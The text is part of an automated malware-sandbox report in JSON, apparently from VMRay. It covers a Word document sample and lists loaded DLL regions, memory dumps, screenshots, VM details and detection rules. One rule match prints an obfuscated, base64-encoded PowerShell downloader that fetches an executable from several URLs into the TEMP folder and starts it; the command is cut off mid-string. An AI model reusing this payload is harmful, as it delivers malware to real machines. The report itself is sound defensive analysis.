"c:\\windows\\system32\\api-ms-win-crt-convert-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1833566208, "timestamp": "00:01:21.419", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 442368, "start_va": 1798176768, "type": "region", "version": 1 }, "end_va": 1798619135, "entry_point": 1798176768, "filename": "\\Windows\\System32\\msvcp140.dll", "id": "region_1502", "name": "msvcp140.dll", "norm_filename": "c:\\windows\\system32\\msvcp140.dll", "region_type": "memory_mapped_file", "start_va": 1798176768, "timestamp": "00:01:21.529", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1833304064, "type": "region", "version": 1 }, "end_va": 1833316351, "entry_point": 1833304064, "filename": "\\Windows\\System32\\api-ms-win-crt-locale-l1-1-0.dll", "id": "region_1504", "name": "api-ms-win-crt-locale-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-locale-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1833304064, "timestamp": "00:01:21.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1802960896, "type": "region", "version": 1 }, "end_va": 1802981375, "entry_point": 1802960896, "filename": "\\Windows\\System32\\api-ms-win-crt-math-l1-1-0.dll", "id": "region_1506", "name": "api-ms-win-crt-math-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-math-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1802960896, "timestamp": "00:01:21.674", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 1802895360, "type": "region", "version": 1 }, "end_va": 1802915839, "entry_point": 1802895360, "filename": "\\Windows\\System32\\api-ms-win-crt-multibyte-l1-1-0.dll", "id": "region_1507", "name": "api-ms-win-crt-multibyte-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-multibyte-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1802895360, "timestamp": "00:01:21.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1802829824, "type": "region", "version": 1 }, "end_va": 1802842111, "entry_point": 1802829824, "filename": "\\Windows\\System32\\api-ms-win-crt-time-l1-1-0.dll", "id": "region_1508", "name": "api-ms-win-crt-time-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-time-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1802829824, "timestamp": "00:01:21.731", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1802764288, "type": "region", "version": 1 }, "end_va": 1802776575, "entry_point": 1802764288, "filename": "\\Windows\\System32\\api-ms-win-crt-filesystem-l1-1-0.dll", "id": "region_1509", "name": "api-ms-win-crt-filesystem-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-filesystem-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1802764288, "timestamp": "00:01:21.749", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1802698752, "type": "region", "version": 1 }, "end_va": 1802711039, "entry_point": 1802698752, "filename": "\\Windows\\System32\\api-ms-win-crt-environment-l1-1-0.dll", "id": "region_1512", "name": "api-ms-win-crt-environment-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-environment-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1802698752, "timestamp": "00:01:21.837", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 1802633216, "type": "region", "version": 1 }, "end_va": 1802645503, "entry_point": 1802633216, "filename": "\\Windows\\System32\\api-ms-win-crt-utility-l1-1-0.dll", "id": "region_1513", "name": "api-ms-win-crt-utility-l1-1-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-crt-utility-l1-1-0.dll", "region_type": "memory_mapped_file", "start_va": 1802633216, "timestamp": "00:01:21.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1638400, "start_va": 1941307392, "type": "region", "version": 1 }, "end_va": 1942945791, "entry_point": 1941950502, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll", "id": "region_1515", "name": "gdiplus.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll", "region_type": "memory_mapped_file", "start_va": 1941307392, "timestamp": "00:01:22.022", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1947860992, "type": "region", "version": 1 }, "end_va": 1947914239, "entry_point": 1947865568, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_1516", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1947860992, "timestamp": "00:01:22.025", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001519-addr_0x00000000002d0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_291", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2949120, "type": "region", "version": 1 }, "end_va": 2953215, "entry_point": 0, "filename": null, "id": "region_1519", "name": "private_0x00000000002d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2949120, "timestamp": "00:01:22.440", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001520-addr_0x00000000002e0000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_292", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 3014656, "type": "region", "version": 1 }, "end_va": 3018751, "entry_point": 0, "filename": null, "id": "region_1520", "name": "private_0x00000000002e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3014656, "timestamp": "00:01:22.440", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 18022400, "type": "region", "version": 1 }, "end_va": 20967423, "entry_point": 18022400, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_1523", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 18022400, "timestamp": "00:01:22.642", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1955127295, "entry_point": 1953621685, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_1524", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:01:22.660", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3084287, "entry_point": 3080192, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_1525", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 3080192, "timestamp": "00:01:22.662", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3153919, "entry_point": 0, "filename": null, "id": "region_1526", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:01:22.667", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001527-addr_0x0000000001400000-size_0x0000000000120000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_293", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1179648, "start_va": 20971520, "type": "region", "version": 1 }, "end_va": 22151167, "entry_point": 0, "filename": null, "id": "region_1527", "name": "private_0x0000000001400000", "norm_filename": null, "region_type": "private_memory", "start_va": 20971520, "timestamp": "00:01:22.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1969618944, "type": "region", "version": 1 }, "end_va": 1969668095, "entry_point": 1969623265, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1528", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1969618944, "timestamp": "00:01:22.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3108863, "entry_point": 0, "filename": null, "id": "region_1535", "name": "pagefile_0x00000000002f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3080192, "timestamp": "00:01:22.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4136959, "entry_point": 0, "filename": null, "id": "region_1536", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:01:22.918", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 20971520, "type": "region", "version": 1 }, "end_va": 21757951, "entry_point": 20971520, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_1537", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 20971520, "timestamp": "00:01:22.919", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001538-addr_0x00000000014e0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_294", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 21889024, "type": "region", "version": 1 }, "end_va": 22151167, "entry_point": 0, "filename": null, "id": "region_1538", "name": "private_0x00000000014e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 21889024, "timestamp": "00:01:22.920", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 22151168, "type": "region", "version": 1 }, "end_va": 26292223, "entry_point": 0, "filename": null, "id": "region_1539", "name": "pagefile_0x0000000001520000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 22151168, "timestamp": "00:01:22.927", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001540-addr_0x0000000001920000-size_0x0000000000200000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_295", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 26345472, "type": "region", "version": 1 }, "end_va": 28442623, "entry_point": 0, "filename": null, "id": "region_1540", "name": "private_0x0000000001920000", "norm_filename": null, "region_type": "private_memory", "start_va": 26345472, "timestamp": "00:01:22.927", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 28442624, "type": "region", "version": 1 }, "end_va": 38076415, "entry_point": 28442624, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_1541", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 28442624, "timestamp": "00:01:22.934", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1942945792, "type": "region", "version": 1 }, "end_va": 1943207935, "entry_point": 1942987485, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1542", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1942945792, "timestamp": "00:01:22.943", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001543-addr_0x0000000001920000-size_0x0000000000090000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_296", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 589824, "start_va": 26345472, "type": "region", "version": 1 }, "end_va": 26935295, "entry_point": 0, "filename": null, "id": "region_1543", "name": "private_0x0000000001920000", "norm_filename": null, "region_type": "private_memory", "start_va": 26345472, "timestamp": "00:01:22.951", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001544-addr_0x0000000001ae0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_297", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 28180480, "type": "region", "version": 1 }, "end_va": 28442623, "entry_point": 0, "filename": null, "id": "region_1544", "name": "private_0x0000000001ae0000", "norm_filename": null, "region_type": "private_memory", "start_va": 28180480, "timestamp": "00:01:22.951", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 26935296, "type": "region", "version": 1 }, "end_va": 27848703, "entry_point": 0, "filename": null, "id": "region_1545", "name": "pagefile_0x00000000019b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 26935296, "timestamp": "00:01:22.952", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1939865600, "type": "region", "version": 1 }, "end_va": 1939943423, "entry_point": 1939873087, "filename": "\\Windows\\System32\\dwmapi.dll", "id": "region_1546", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\system32\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1939865600, "timestamp": "00:01:22.957", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001547-addr_0x0000000002450000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_298", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 38076416, "type": "region", "version": 1 }, "end_va": 38600703, "entry_point": 0, "filename": null, "id": "region_1547", "name": "private_0x0000000002450000", "norm_filename": null, "region_type": "private_memory", "start_va": 38076416, "timestamp": "00:01:22.967", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 21757952, "type": "region", "version": 1 }, "end_va": 21762047, "entry_point": 0, "filename": null, "id": "region_1548", "name": "pagefile_0x00000000014c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 21757952, "timestamp": "00:01:22.981", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 }, { "comment": "The operating system was rebooted during the analysis.", "id": 128, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "49343.doc", "id": 17571, "md5_hash": "890ce730a3cf43f43039f114744df924", "sample_type": "word_document", "sha1_hash": "19142bb0a5cdb0a7ad3520d1693ef5f3761d6d9a", "sha256_hash": "d9c9e1fece032140a4754096b08a4eb147598a36f8b582c796b8764ff6cd9a91", "size": 91136, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 172727, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_26112.png", "size": 212652, "thumbnail_archive_path": "screenshots/thumbnail_26112.png", "timestamp": "00:00:26.112", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_27115.png", "size": 270346, "thumbnail_archive_path": "screenshots/thumbnail_27115.png", "timestamp": "00:00:27.115", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_29146.png", "size": 269536, "thumbnail_archive_path": "screenshots/thumbnail_29146.png", "timestamp": "00:00:29.146", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_33230.png", "size": 57773, "thumbnail_archive_path": "screenshots/thumbnail_33230.png", "timestamp": "00:00:33.230", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_34245.png", "size": 162730, "thumbnail_archive_path": "screenshots/thumbnail_34245.png", "timestamp": "00:00:34.245", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_39266.png", "size": 160323, "thumbnail_archive_path": "screenshots/thumbnail_39266.png", "timestamp": "00:00:39.266", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_86374.png", "size": 123767, "thumbnail_archive_path": "screenshots/thumbnail_86374.png", "timestamp": "00:01:26.374", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_87441.png", "size": 121936, "thumbnail_archive_path": "screenshots/thumbnail_87441.png", "timestamp": "00:01:27.441", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_88489.png", "size": 159188, "thumbnail_archive_path": "screenshots/thumbnail_88489.png", "timestamp": "00:01:28.489", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_99166.png", "size": 59957, "thumbnail_archive_path": "screenshots/thumbnail_99166.png", "timestamp": "00:01:39.166", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_100170.png", "size": 68551, "thumbnail_archive_path": "screenshots/thumbnail_100170.png", "timestamp": "00:01:40.170", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_101174.png", "size": 58761, "thumbnail_archive_path": "screenshots/thumbnail_101174.png", "timestamp": "00:01:41.174", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_104234.png", "size": 64113, "thumbnail_archive_path": "screenshots/thumbnail_104234.png", "timestamp": "00:01:44.234", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_105242.png", "size": 42301, "thumbnail_archive_path": "screenshots/thumbnail_105242.png", "timestamp": "00:01:45.242", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_107339.png", "size": 488851, "thumbnail_archive_path": "screenshots/thumbnail_107339.png", "timestamp": "00:01:47.339", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_152491.png", "size": 4187, "thumbnail_archive_path": "screenshots/thumbnail_152491.png", "timestamp": "00:02:32.491", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_153495.png", "size": 488886, "thumbnail_archive_path": "screenshots/thumbnail_153495.png", "timestamp": "00:02:33.495", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-08-21 12:23", "analyzer_version": "2.2.0", "chrome_version": "58.0.3029.110", "firefox_version": "25.0", "flash_version": "10.3.183.86", "internet_explorer_version": "8.0.7601.17514", "java_version": "7.0.600", "microsoft_excel_version": "16.0.4266.1003", "microsoft_office_version": "16.0.4266.1003", "microsoft_power_point_version": "16.0.4266.1003", "microsoft_project_version": "16.0.4266.1003", "microsoft_publisher_version": "16.0.4266.1003", "microsoft_visio_version": "16.0.4266.1003", "microsoft_word_version": "16.0.4266.1003", "silverlight_version": "not_installed", "type": "vm_and_analyzer_details", "version": 1, "vm_architecture": "x86_32-bit_pae", "vm_kernel_version": "6.1.7601.17514_(684da42a-30cc-450f-81c5-35b4d18944b1)", "vm_name": null, "vm_os": "windows_7" }, "vti": { "type": "vti", "version": 1, "vti_built_in_rules_version": "2.6", "vti_rule_matches": [ { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_device", "category_desc": "Device", "operation": "_hook_keyboard", "operation_desc": "Monitor keyboard input", "ref_gfncalls": [ { "ref_id": "gfn_51", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_hook_keyboard_by_keystate_api", "technique_desc": "Read the current state of the \"VK_CANCEL\" by API.", "technique_path": "built_in._device._hook_keyboard.vmray_hook_keyboard_by_keystate_api", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_process", "category_desc": "Process", "operation": "_document_create_process", "operation_desc": "Create process", "ref_gfncalls": [ { "ref_id": "gfn_134", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 4, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_document_create_process", "technique_desc": "Create process \"powershell -e JAB7AHcAYABzAGAAYwBSAEkAcAB0AH0AIAA9ACAAJgAoACIAewAyAH0AewAxAH0AewAwAH0AIgAtAGYAIAAnAG8AYgBqAGUAYwB0ACcALAAnAGUAdwAtACcALAAnAG4AJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADQAfQB7ADIAfQB7ADEAfQB7ADMAfQB7ADAAfQAiACAALQBmACAAJwBsAGwAJwAsACcAUwAnACwAJwAuACcALAAnAGgAZQAnACwAJwBXAFMAYwByAGkAcAB0ACcAKQA7ACQAewBXAGUAQgBjAGwAYABpAGAARQBOAHQAfQAgAD0AIAAuACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADMAfQAiACAALQBmACAAJwBuAGUAdwAtACcALAAnAG8AJwAsACcAYgAnACwAJwBqAGUAYwB0ACcAKQAgACgAIgB7ADQAfQB7ADEAfQB7ADMAfQB7ADAAfQB7ADIAfQAiACAALQBmACAAJwBsAGkAZQAnACwAJwB0AGUAbQAuAE4AZQB0ACcALAAnAG4AdAAnACwAJwAuAFcAZQBiAEMAJwAsACcAUwB5AHMAJwApADsAJAB7AHIAYQBgAE4ARABPAE0AfQAgAD0AIAAmACgAIgB7ADMAfQB7ADIAfQB7ADEAfQB7ADAAfQAiACAALQBmACcAYwB0ACcALAAnAGIAagBlACcALAAnAGUAdwAtAG8AJwAsACcAbgAnACkAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAIAAnAHIAYQBuAGQAbwAnACwAJwBtACcAKQA7ACQAewB1AGAAUgBsAFMAfQAgAD0AIAAoACIAewAxADcAfQB7ADIAMQB9AHsAMQAxAH0AewAxADUAfQB7ADEAfQB7ADMAfQB7ADMAOAB9AHsAMwA5AH0AewAzADcAfQB7ADIAMgB9AHsAMQAwAH0AewA2AH0AewAzADEAfQB7ADAAfQB7ADMANAB9AHsAMQA2AH0AewAyADYAfQB7ADMAMAB9AHsAMgAwAH0AewAxADQAfQB7ADkAfQB7ADMANgB9AHsAMgAzAH0AewA4AH0AewAyADQAfQB7ADIANQB9AHsAMgA5AH0AewAyADgAfQB7ADEAMgB9AHsANQB9AHsAMgB9AHsAMQA5AH0AewAyADcAfQB7ADcAfQB7ADEAMwB9AHsANAB9AHsAMQA4AH0AewAzADMAfQB7ADMANQB9AHsAMwAyAH0AIgAgAC0AZgAgACcAZQBhAHQAcwBwAGEAJwAsACcAaQBuAGUAJwAsACcAcwAuAGMAJwAsACcAYQBsAC4AYwBvAG0AJwAsACcAZwAnACwAJwBsAHUAJwAsACcAaAAnACwAJwByAGUAcwBzAC8AJwAsACcAZQBzAC4AbgBlACcALAAnAC8ALABoAHQAdABwACcALAAnACwAJwAsACcALwBrAGUAJwAsACcALwBiAG0AYQBzAHQAZQByAHAAJwAsACcARAAnACwAJwB5AHIAcgAnACwAJwByACcALAAnAC4AdQBrAC8AVgBRAC8ALABoAHQAdABwADoALwAvAHUAbQBlACcALAAnAGgAdAB0ACcALAAnAE4AJwAsACcAbwBtAC8AJwAsACcAbwBtAC8AJwAsACcAcAA6AC8AJwAsACcALwBoAFEAbwBCAG0ALwAnACwAJwAvAC8AbgB5AGUAcgBnACcALAAnAHQALwAnACwAJwBxAHEAcgAvACwAJwAsACcAeAAnACwAJwB3AG8AcgBkAHAAJwAsACcAcAA6AC8AJwAsACcAaAB0AHQAJwAsACcAeAAuAGMAJwAsACcAdAB0AHAAOgAvAC8AJwAsACcASgBGAGgALwAnACwAJwBuAGsAJwAsACcAbQAuAGMAbwAnACwAJwBHACcALAAnADoAJwAsACcAdAAnACwAJwAvAHMAJwAsACcAaQBtAHAAbAB5AGUAbABlAGcAYQBuACcAKQAuACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbABpAHQAJwAsACcAUwBwACcAKQAuAEkAbgB2AG8AawBlACgAJwAsACcAKQA7ACQAewBuAGAAQQBtAEUAfQAgAD0AIAAkAHsAcgBhAG4ARABgAE8ATQB9AC4AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAHQAJwAsACcAbgBlAHgAJwApAC4ASQBuAHYAbwBrAGUAKAAxACwAIAA2ADUANQAzADYAKQA7ACQAewBQAGAAQQBUAEgAfQAgAD0AIAAkAHsARQBgAE4AdgA6AGAAVABFAE0AUAB9ACAAKwAgACcAXAAnACAAKwAgACQAewBOAGAAQQBtAEUAfQAgACsAIAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBlAHgAZQAnACwAJwAuACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHsAdQBgAFIAbAB9ACAAaQBuACAAJAB7AFUAUgBgAGwAUwB9ACkAewB0AHIAeQB7ACQAewB3AEUAYgBgAGMATABJAGUAYABOAHQAfQAuACgAIgB7ADEAfQB7ADAAfQB7ADIAfQAiAC0AZgAnAG4AbAAnACwAJwBEAG8AdwAnACwAJwBvAGEAZABGAGkAbABlACcAKQAuAEkAbgB2AG8AawBlACgAJAB7AHUAYABSAEwAfQAuACgAIgB7ADIAfQB7ADEAfQB7ADAAfQAiAC0AZgAgACcAbgBnACcALAAnAGkAJwAsACcAVABvAFMAdAByACcAKQAuAEkAbgB2AG8AawBlACgAKQAsACAAJAB7AFAAYABBAHQAaAB9ACkAOwAmACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACAAJwBTACcALAAnAHQAYQByAHQALQAnACwAJwBQAHIAbwBjAGUAcwBzA